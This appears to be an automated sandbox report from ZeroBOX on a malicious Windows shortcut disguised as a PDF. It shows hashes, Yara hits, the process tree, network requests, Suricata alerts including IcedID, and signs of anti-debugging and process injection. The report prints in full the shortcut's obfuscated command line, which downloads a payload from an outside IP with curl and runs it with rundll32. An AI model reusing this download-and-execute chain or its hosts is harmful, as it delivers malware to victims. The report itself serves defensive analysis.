Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Sept. 27, 2023, 10:52 a.m.	Sept. 27, 2023, 10:54 a.m.

Size	2.1KB
Type	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Icon number=0, Archive, ctime=Wed Oct 6 04:51:36 2021, mtime=Tue Sep 26 02:14:46 2023, atime=Wed Oct 6 04:51:36 2021, length=289792, window=hidenormalshowminimized
MD5	`3d2651a982fff4f68e6cef1f94ce5ee4`
SHA256	`a56edeb6cbe2b16e449e4be28543b4d43fdb9cea8a602262eb5c3bf238d5d44b`
CRC32	`E52DB8ED`
ssdeep	`24:8aYUWJCnBc2LA8J8OIV+/r7KcazETexIis3i85RJ:8aY6iSZIk7KcazETexMd`
Yara	Lnk_Format_Zero - LNK Format lnk_file_format - Microsoft Windows Shortcut File Format Generic_Malware_Zero - Generic Malware

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "JFOALBGi" C:\Users\test22\AppData\Local\Temp\9Z.pdf.lnk
1648
- cmd.exe "C:\Windows\System32\cmd.exe" /c doe9 || eCHo doe9 & Pi"nG" doe9 || C"U"R"L" h"ttp"://"9"5.16"4"."1"7."5"9"/"Z"I"br"7/"L0"8" -o C:\Users\test22\AppData\Local\Temp\doe9.log & Pi"nG" -n 4 doe9 || rundll32 C:\Users\test22\AppData\Local\Temp\doe9.log scab /k besogon728 & E"Xi"t '=GaFTRUaPqc
  2152
  - PING.EXE Pi"nG" doe9
    2260
  - curl.exe C"U"R"L" h"ttp"://"9"5.16"4"."1"7."5"9"/"Z"I"br"7/"L0"8" -o C:\Users\test22\AppData\Local\Temp\doe9.log
    2324
  - PING.EXE Pi"nG" -n 4 doe9
    2420
  - rundll32.exe rundll32 C:\Users\test22\AppData\Local\Temp\doe9.log scab /k besogon728
    2468
    - rundll32.exe rundll32 C:\Users\test22\AppData\Local\Temp\doe9.log scab /k besogon728
      2536

Name	Response	Post-Analysis Lookup
skrgerona.com	A 104.21.57.237 A 172.67.193.129	104.21.57.237

IP Address	Status	Action
164.124.101.2	Active	Moloch
172.67.193.129	Active	Moloch
95.164.17.59	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49166 -> 95.164.17.59:80	2013028	ET POLICY curl User-Agent Outbound	Attempted Information Leak
TCP 192.168.56.103:49166 -> 95.164.17.59:80	2034567	ET HUNTING curl User-Agent to Dotted Quad	Potentially Bad Traffic
TCP 192.168.56.103:49170 -> 172.67.193.129:80	2032086	ET MALWARE Win32/IcedID Request Cookie	A Network Trojan was detected
TCP 95.164.17.59:80 -> 192.168.56.103:49166	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 95.164.17.59:80 -> 192.168.56.103:49166	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Sept. 27, 2023, 10:52 a.m.			0	0

Command line console output was observed (5 events)

Time & API	Arguments	Status	Return
WriteConsoleW Sept. 27, 2023, 10:52 a.m.	buffer: 'doe9' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW Sept. 27, 2023, 10:52 a.m.	buffer: doe9 console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:52 a.m.	buffer: 'E"Xi"t' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleA Sept. 27, 2023, 10:52 a.m.	buffer: Ping request could not find host doe9. Please check the name and try again. console_handle: 0x00000007	1	1
WriteConsoleA Sept. 27, 2023, 10:52 a.m.	buffer: Ping request could not find host doe9. Please check the name and try again. console_handle: 0x00000007	1	1

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (2 events)

suspicious_features	Connection to IP address				suspicious_request	GET http://95.164.17.59/ZIbr7/L08
suspicious_features	GET method with no useragent header				suspicious_request	GET http://skrgerona.com/

Performs some HTTP requests (2 events)

request	GET http://95.164.17.59/ZIbr7/L08
request	GET http://skrgerona.com/

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\9Z.pdf.lnk

Creates a suspicious process (1 event)

cmdline

"C:\Windows\System32\cmd.exe" /c doe9 || eCHo doe9 & Pi"nG" doe9 || C"U"R"L" h"ttp"://"9"5.16"4"."1"7."5"9"/"Z"I"br"7/"L0"8" -o C:\Users\test22\AppData\Local\Temp\doe9.log & Pi"nG" -n 4 doe9 || rundll32 C:\Users\test22\AppData\Local\Temp\doe9.log scab /k besogon728 & E"Xi"t '=GaFTRUaPqc

Yara rule detected in process memory (9 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Communicates with host for which no DNS query was performed (1 event)

host

95.164.17.59

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1648 resumed a thread in remote process 2152
NtResumeThread Sept. 27, 2023, 10:52 a.m.	thread_handle: 0x000002ec suspend_count: 1 process_identifier: 2152	1	0	0

9Z.pdf.lnk

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All